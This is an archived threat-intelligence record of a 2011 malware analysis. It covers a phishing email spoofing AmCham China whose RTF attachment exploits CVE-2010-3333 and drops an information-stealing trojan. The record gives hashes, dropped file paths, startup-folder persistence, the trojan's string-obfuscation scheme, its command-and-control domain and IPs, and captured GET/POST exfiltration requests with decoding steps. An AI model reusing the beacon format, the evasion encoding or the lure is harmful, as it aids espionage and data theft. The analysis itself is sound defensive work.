{
	"id": "dc1f3c6c-bc70-4346-9de8-883b60bd21cd",
	"created_at": "2026-04-06T00:12:20.244884Z",
	"updated_at": "2026-04-10T03:21:03.957525Z",
	"deleted_at": null,
	"sha1_hash": "36a1ab484f47692c8d4c90571054b892fad64366",
	"title": "Jan 6 CVE-2010-3333 DOC with info theft trojan from the American Chamber of Commerce",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1072080,
	"plain_text": "Jan 6 CVE-2010-3333 DOC with info theft trojan from the American\r\nChamber of Commerce\r\nArchived: 2026-04-05 14:19:31 UTC\r\nOriginal Message\r\nFrom: SXXX WXXXXX [mailto:XXXXX@amchamchina.org]\r\nSent: Thursday, January 06, 2011 8:46 PM\r\nTo: XXXXXXXXXXX\r\nSubject: Three Big Risks to China's Economy In 2011\r\nDear XXXXX:\r\nPlease kindly find the attachment for your need.\r\nIf you have any question please let me know.\r\nBest regards,\r\nUlan Tuya         \r\nSenior Communications Manager     \r\n86-10-8519-0835       \r\nutuya@amchamchina.org\r\n***************************\r\nAmCham-China is a non-partisan and independent non-profit organization representing the interests of some 2,600\r\ncompanies and individuals doing\r\nbusiness throughout China. Formally recognized by China’s Ministry of Civil Affairs in 1991, AmCham-China is the leader\r\nat promoting American\r\nbusiness interests in China. Headquartered in Beijing, with chapters in Central China (Wuhan) Tianjin and Dalian, the\r\nChinese government recognizes\r\nAmCham-China as America’s official chamber of commerce. 
\r\nMessage Headers\r\nReceived: (qmail 12375 invoked from network); 7 Jan 2011 01:46:31 -0000\r\nReceived: from mail.amchamchina.org (HELO amcham.amchamchina.org) (122.200.77.250)\r\n  by XXXXXXXXXXXXXXXX with RC4-SHA encrypted SMTP; 7 Jan 2011 01:46:31 -0000\r\nReceived: from AMCMAIL.amchamchina.org ([122.200.77.246]) by\r\n amcham.amchamchina.org ([122.200.77.250]) with mapi; Fri, 7 Jan 2011 09:48:21\r\n +0800\r\nFrom: SXXX WXXX\r\nhttps://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html\r\nPage 1 of 10\n\nTo: XXXXXXXXXXXXXX\r\nDate: Fri, 7 Jan 2011 09:46:17 +0800\r\nSubject: Three Big Risks to China's Economy In 2011\r\nThread-Topic: Three Big Risks to China's Economy In 2011\r\nThread-Index: AQHLrgx3tarISKEiT0OWHRNyijQ+D5PEvUAO\r\nMessage-ID: \u003c146350E596927B48A9D8F7B0464B167F1762C211CB@AMCMAIL.amchamchina.org\u003e\r\nReferences: \u003c146350E596927B48A9D8F7B0464B167F1762C211CA@AMCMAIL.amchamchina.org\u003e\r\nIn-Reply-To: \u003c146350E596927B48A9D8F7B0464B167F1762C211CA@AMCMAIL.amchamchina.org\u003e\r\nAccept-Language: zh-CN, en-US\r\nContent-Language: zh-CN\r\nX-MS-Has-Attach: yes\r\nX-MS-TNEF-Correlator:\r\nacceptlanguage: zh-CN, en-US\r\nx-tm-as-product-ver: SMEX-8.0.0.4125-6.500.1024-17878.000\r\nx-tm-as-result: No--40.303000-0.000000-31\r\nx-tm-as-user-approved-sender: Yes\r\nx-tm-as-user-blocked-sender: No\r\nContent-Type: multipart/mixed;\r\n    boundary=\"_004_146350E596927B48A9D8F7B0464B167F1762C211CBAMCMAILamcham_\"\r\nMIME-Version: 1.0\r\nSender\r\nIP Information for 122.200.77.250\r\nIP Location: China Beijing Beijing Heju Shuzi Telecom Engineering Co.ltd\r\nResolve Host: mail.amchamchina.org\r\nIP Address: 122.200.77.250\r\ninetnum:        122.200.64.0 - 122.200.127.255\r\nnetname:        LTEL\r\ndescr:          LONGTEL NETWORKS \u0026 TECHNOLOGIES LTD.\r\ndescr:          Room 601, Block B, Thunis Development Building\r\ndescr:          No.11 HuiXin East Street,Chaoyang District,\r\ndescr:          
Beijing,100029,P.R.C.\r\nchanged:          20080324\r\nsource:         APNIC\r\nperson:         Wang Dan\r\nnic-hdl:        WD501-AP\r\ne-mail:         \r\naddress:        LONGTEL NETWORKS \u0026 TECHNOLOGIES LTD.\r\naddress:        Room 601 Block B Thunis Development Building\r\naddress:        No.11 HuiXin East Street,\r\naddress:        Chaoyang District,Beijing,100029,P.R.C.\r\nphone:          +86-10-64823381\r\nfax-no:         +86-10-64823885\r\ncountry:        CN\r\nchanged:          20070910\r\nmnt-by:         MAINT-NEW\r\nsource:         APNIC\r\nperson:         Ren Weidong\r\nnic-hdl:        RW432-AP\r\ne-mail:         \r\naddress:        LONGTEL NETWORKS \u0026 TECHNOLOGIES LTD.\r\naddress:        Room 601 Block B Thunis Development Building\r\naddress:        No.11 HuiXin East Street,\r\naddress:        Chaoyang District,Beijing,100029,P.R.C.\r\nphone:          +86-10-64823381\r\nfax-no:         +86-10-64823885\r\ncountry:        CN\r\nchanged:          20070910\r\nmnt-by:         MAINT-NEW\r\nsource:         APNIC\r\nAutomated Scans\r\nFile name: Three Big Risks to China's Economy In 2011.doc\r\nhttp://www.virustotal.com/file-scan/report.html?id=dc1e0b63020d586526320c0bc0f44862ba34f84fb4697e13037d3d4ff54718a1-1294403371\r\nSubmission date: 2011-01-07 12:29:31 (UTC)\r\nResult: 7 /43 (16.3%)\r\nAvast 4.8.1351.0 2011.01.06 RTF:CVE-2010-3333\r\nAvast5 5.0.677.0 2011.01.06 RTF:CVE-2010-3333\r\nClamAV 0.96.4.0 2011.01.07 BC.Exploit.CVE_2010_3333\r\nGData 21 2011.01.07 RTF:CVE-2010-3333\r\nMcAfee 5.400.0.1158 2011.01.07 Exploit-CVE2010-3333\r\nMicrosoft 1.6402 2011.01.07 Exploit:Win32/CVE-2010-3333\r\nSophos 4.61.0 2011.01.07 Exp/20103333-A\r\nMD5   : 5a0aac44ddaad1e512a0d505c217baff\r\nSHA1  : ab6f90bf582bf01985989c1e9a99932243402479\r\nSHA256: dc1e0b63020d586526320c0bc0f44862ba34f84fb4697e13037d3d4ff54718a1\r\nssdeep: 
768:vAL60V502HFUDmGIFmwFrKBqQA7bzmqhe6XQKOWM2xs/gSdlY:vS60V6BhIE8rKAQWzS6gKOWeIl\r\nFile size : 51643 bytes\r\nFirst seen: 2011-01-07 12:29:31\r\nLast seen : 2011-01-07 12:29:31\r\nMagic: Rich Text Format data, version 1, unknown character set\r\nTrID:\r\nRich Text Format (100.0%)\r\nFiles Created\r\nFile: userinit.exe\r\nSize: 49664\r\nMD5:  20DD4DD02C2B17A40B26843AA0C660F6\r\nVirustotal\r\nFile name: userinit.exe\r\nSubmission date: 2011-01-07 12:37:11 (UTC)\r\nResult: 6 /42 (14.3%)\r\nAvast 4.8.1351.0 2011.01.07 Win32:Malware-gen\r\nAvast5 5.0.677.0 2011.01.06 Win32:Malware-gen\r\nDrWeb 5.0.2.03300 2011.01.07 Trojan.MulDrop1.47445\r\nF-Secure 9.0.16160.0 2011.01.07 Gen:Trojan.Heur.LP.cu5@a8zokfo\r\nGData 21 2011.01.07 Win32:Malware-gen\r\nJiangmin 13.0.900 2011.01.07 Trojan/Genome.epw\r\nMD5   : 20dd4dd02c2b17a40b26843aa0c660f6\r\nFile: userinit.dll\r\nhttp://www.virustotal.com/file-scan/report.html?id=40aecc6024f83fa2f7b1fdc0b0bcb765d32c62a0b6909dd1ab4821b1f3c64d3f-1294426448\r\nSize: 40960\r\nMD5:  DC574F47A55E022C32A12F55EEC16CC7\r\nFile name: userinit.dll\r\nSubmission date: 2011-01-07 18:54:08 (UTC)\r\nResult: 7 /43 (16.3%)\r\nAvast 4.8.1351.0 2011.01.07 Win32:Malware-gen\r\nAvast5 5.0.677.0 2011.01.07 Win32:Malware-gen\r\nBitDefender 7.2 2011.01.07 Gen:Trojan.Heur.LP.cu4@a8zokfo\r\nComodo 7327 2011.01.07 TrojWare.Win32.PSW.Delf.~JHN\r\nF-Secure 9.0.16160.0 2011.01.07 Gen:Trojan.Heur.LP.cu4@a8zokfo\r\nGData 21 2011.01.07 Gen:Trojan.Heur.LP.cu4@a8zokfo\r\nPanda 10.0.2.7 2011.01.07 Suspicious file\r\nMD5   : dc574f47a55e022c32a12f55eec16cc7\r\nCreated files\r\nC:\\Documents and Settings\\mila\\Local Settings\\Application Data\\Windows\\userinit.dll     MD5: DC574F47A55E022C32A12F55EEC16CC7\r\nC:\\Documents and Settings\\mila\\Local Settings\\Application Data\\Windows\\userinit.exe     MD5: 20DD4DD02C2B17A40B26843AA0C660F6\r\nC:\\Documents 
and Settings\\mila\\Start Menu\\Programs\\Startup\\userinit.exe             MD5: 20DD4DD02C2B17A40B26843AA0C660F6\r\nC:\\Documents and Settings\\All Users\\Application Data\\desktop.BIN            MD5: 20DD4DD02C2B17A40B26843AA0C660F6\r\nSee Anubis and Joe box reports for more details. Here are a few notes:\r\n1. I did not observe any changes in the registry. Persistence is achieved via relaunching the binary from the infected user's startup folder (Start Menu\\Programs\\Startup\\userinit.exe); a copy of the file also gets created as All Users\\Application Data\\desktop.BIN\r\n2. Userinit.exe creates a Logs folder at %userprofile%\\Local Settings\\Application Data\\Windows\\Logs. A shortcut like the one in the image below shows up in that directory for a split second, but I did not capture it. This is the file that gets transmitted with the HTTP POST; MDAwMGhIRUwuMDk in the meta part of the URL string can be decoded as meta=0000hHEL.09\r\n**POST /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYAOAAuADIALgAyAA%3D%3D%26meta%3DMDAwMGhIRUwuMDk%3D%26id%3Dlfdxfircvscxggb HTTP/1.1.\r\nThe last part - lfdxfircvscxggb - is changing with each GET request and is possibly an encoded directory name on the victim PC (thanks to Villy for the info here)\r\n3. See the ASCII strings below. It appears the binary gathers the system info (a Sysinfo.txt file gets created and deleted), IP address, and user name for transmission to the remote server. The listing of file extensions (.doc.xls.pdf.rtf.eml.pgp.vpn.wab.csv.docx.xlsx + **Proxy info****Office info***IE info****Hotfix info****OS info**) is interesting. We did not observe any file transmissions, but possibly obtaining the files with the listed extensions is the end goal of the attackers.\r\n4. 
Villy provided the following info:\r\n\"some strings encoded using simple encoding to bypass static analysis by AV\r\nto decode strings used the following algorithm\r\nfor(i=0;i\r\nit means that every byte in the string is decreased by the number of its position in the string\r\nuserinit.dll - is a service\r\nand installed with svchost(SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\r\nIt also grabs protected storage (saved passwords from IE 6.0 and below), and saved Outlook passwords, versions of MS Office and Internet Explorer\r\n5. Hooks userinit.dll into explorer.exe (only Explorer.exe on the Windows XP box despite a large number of apps open and processes running) and into multiple processes (observed on the Windows 7 box)\r\nWindows XP\r\nWindows 7\r\nNote the HTML code of the page displayed upon visiting http://globalization.interiorgov.net/windowsupdatev7 can be seen in the ASCII strings of the binary\r\n..div align=\"center\"..Under Construction\r\n..div align=\"center\"..;www.microsoft.com\r\nASCII strings (partial) userinit.exe\r\nhttp://anubis.iseclab.org/?action=result\u0026task_id=11c167a3ff87c2e24fd3e993d65ae2aae\r\nNetwork activity\r\nDownload the Anubis-generated pcap file\r\n[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]\r\n DNS Queries:\r\n Name: [ globalization.interiorgov.net ], Query Type: [ DNS_TYPE_A ],\r\n Query Result: [ 123.120.107.46 ], Successful: [ 1 ], Protocol: [ udp ]\r\n[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]\r\n HTTP Conversations:\r\n to 123.120.107.46:80 - [ globalization.interiorgov.net ]\r\n Request: [ GET /windowsupdatev7/search?hl=UABDAA==\u0026q=MQA5ADIALgAxADYAOAAuADAALgAyAA==\u0026meta=Lg==\u0026i\r\nto 123.120.107.46:80 - [ globalization.interiorgov.net ]\r\n Request: [ GET 
/windowsupdatev7/search?hl=UABDAA==\u0026q=MQA5ADIALgAxADYAOAAuADAALgAyAA==\u0026meta=Li4=\u0026i\r\nContents of the web server robots.txt file (thanks to Andre')\r\nBurp proxy error: failed to connect to globalization.interiorgov.net:80\r\nDomain:     interiorgov.net - Domain History\r\nCache Date:     2011-01-03\r\nRegistrar:     NAME2HOST, INC. DBA NAME2HOST.COM\r\nServer:     whois.name2host.com\r\nCreated:     2010-09-07\r\nUpdated:     2010-09-07\r\nExpires:     2011-09-07\r\nqingwa20102010@163.com\r\nDomain name: INTERIORGOV.NET\r\n   Updated Date: 2010-09-08\r\n   Creation Date: 2010-09-08\r\n   Expiration Date: 2011-09-08\r\nRegistrar of Record: NAME2HOST, INC.\r\nDomain servers in listed order:\r\n    DNS1.51.NET   118.144.82.171\r\n    DNS2.51.NET   118.145.1.7\r\nIP addresses\r\nThe hosting IP address of the domain keeps changing, but stays within the same provider\r\nIP Address 1 - As recorded on January 7, 2011\r\nIP address 123.120.107.46\r\ninetnum:      123.112.0.0 - 123.127.255.255\r\nnetname:      UNICOM-BJ\r\ndescr:        China Unicom Beijing province network\r\naddress:      No.21,Jin-Rong Street\r\naddress:      Beijing,100140\r\naddress:      P.R.China\r\nphone:        +86-10-66259940\r\nfax-no:       +86-10-66259764\r\nperson:       sun ying\r\naddress:      fu xing men nei da jie 97, Xicheng District\r\naddress:      Beijing 100800\r\nThere are usually 2-4 HTTP GET requests followed by one HTTP POST (12,000-20,000 bytes in length), followed by many HTTP GET requests again. I did not observe more than one HTTP POST per binary execution. 
The strings in HTTP GET requests are identical except for the last part, \"id\", of the string (see this code in the binary:\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\n/windowsupdatev7/search?hl=%s\u0026q=%s\u0026meta=%s\u0026id=%s)\r\nExample 1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nPOST /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nGET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC HTTP/1.1\r\nExample 2\r\nThe strings sometimes retransmit [TCP Retransmission] and you will see identical GET requests\r\n**GET /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYAOAAuADIALgAyAA%3D%3D%26meta%3DLg%3D%3D%26id%3Dphqghumeaylnlfd HTTP/1.1\r\n**GET /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYAOAAuADIALgAyAA%3D%3D%26meta%3DLi4%3D%26id%3Dxfircvscxggbwkf HTTP/1.1\r\n**GET /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYAOAAuADIALgAyAA%3D%3D%26meta%3DLi4%3D%26id%3Dxfircvscxggbwkf HTTP/1.1\r\n**POST /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYAOAAuADIALgAyAA%3D%3D%26meta%3DMDAwMGhIRUwuMDk%3D%26id%3Dlfdxfircvscxggb HTTP/1.1\r\nStrings can be decoded:\r\n\u003c?php\r\necho 
urldecode(\"GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4A HTTP/1.1\");\r\n?\u003e\r\n|||\r\nGET /windowsupdatev7/search?hl=WABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA\u0026q=MQA3ADIALgAyADkALgAwAC4AMQAxADYA\u0026meta=Lg==\u0026id=amyeh HTTP/1.1\r\n(with the %-encoding removed: %3D is =, %26 is \u0026)\r\n|||\r\n\u003c?php\r\necho \"hl=\".base64_decode(\"WABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA\").\"\\n\";\r\necho \"q=\".base64_decode(\"MQA3ADIALgAyADkALgAwAC4AMQAxADYA\").\"\\n\";\r\necho \"meta=\".base64_decode(\"Lg==\").\"\\n\";\r\necho \"id=\".base64_decode(\"amyehwqnqrqpmxu\").\"\\n\";\r\n?\u003e\r\n|||\r\nhl - computer name (Unicode string encoded with base64)\r\nq - IP address (Unicode string encoded with base64)\r\nmeta - directory where to search (base64 encoded)\r\nid - changing string, presumably a directory name on the victim's PC\r\n|||\r\nThe end result:\r\nhl=XPSP3-R93-OFC20\r\nq=172.29.0.116\r\nAs mentioned above, MDAwMGhIRUwuMDk in the meta part of the URL string can be decoded as meta=0000hHEL.09\r\n**POST /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYAOAAuADIALgAyAA%3D%3D%26meta%3DMDAwMGhIRUwuMDk%3D%26id%3Dlfdxfircvscxggb HTTP/1.1. 
\r\nThe last part - lfdxfircvscxggb - is changing with each GET request and is possibly an encoded directory name on the victim PC (thanks to Villy for his help with these)\r\nIP Address 2 - Changed between 10 and 11 pm, January 7, 2011\r\nIP Address:   114.248.83.92\r\nNetRange:     114.0.0.0 - 114.255.255.255\r\nnetname:      UNICOM-BJ\r\ndescr:        China Unicom Beijing province network\r\naddress:      No.21,Jin-Rong Street\r\naddress:      Beijing,100140\r\naddress:      P.R.China\r\nphone:        +86-10-66259940\r\nfax-no:       +86-10-66259764\r\nperson:       sun ying\r\naddress:      fu xing men nei da jie 97, Xicheng District\r\naddress:      Beijing 100800\r\nSSL traffic started for the environment.interiorgov.net domain, and unlike globalization.interiorgov.net, the environment subdomain is not hardcoded in the binary downloaded from the server (see 114.248.83.92userinitJan7-11pm.pcap, tcp.stream eq 3; correction from Kyle Yung); all communications always start with globalization.interiorgov.net. 
Also, the SSL traffic was observed only for 114.248.83.92\r\nExample of SSL traffic\r\nThe following conversation between the server and the victim PC also takes place (thanks to Andre' DiMino for the capture :)\r\nIP Address 3 - Changed before 9 am on January 8, 2011\r\nIP Address:   123.120.106.88\r\ninetnum:      123.112.0.0 - 123.127.255.255\r\nnetname:      UNICOM-BJ\r\ndescr:        China Unicom Beijing province network\r\naddress:      No.21,Jin-Rong Street\r\naddress:      Beijing,100140\r\naddress:      P.R.China\r\nphone:        +86-10-66259940\r\nfax-no:       +86-10-66259764\r\nperson:       sun ying\r\naddress:      fu xing men nei da jie 97, Xicheng District\r\naddress:      Beijing 100800\r\nThe hosting history screenshot posted below does not include all the changes for the past two days\r\nSource: https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html"
	],
	"report_names": [
		"jan-6-cve-2010-3333-with-info-theft.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434340,
	"ts_updated_at": 1775791263,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/36a1ab484f47692c8d4c90571054b892fad64366.pdf",
		"text": "https://archive.orkl.eu/36a1ab484f47692c8d4c90571054b892fad64366.txt",
		"img": "https://archive.orkl.eu/36a1ab484f47692c8d4c90571054b892fad64366.jpg"
	}
}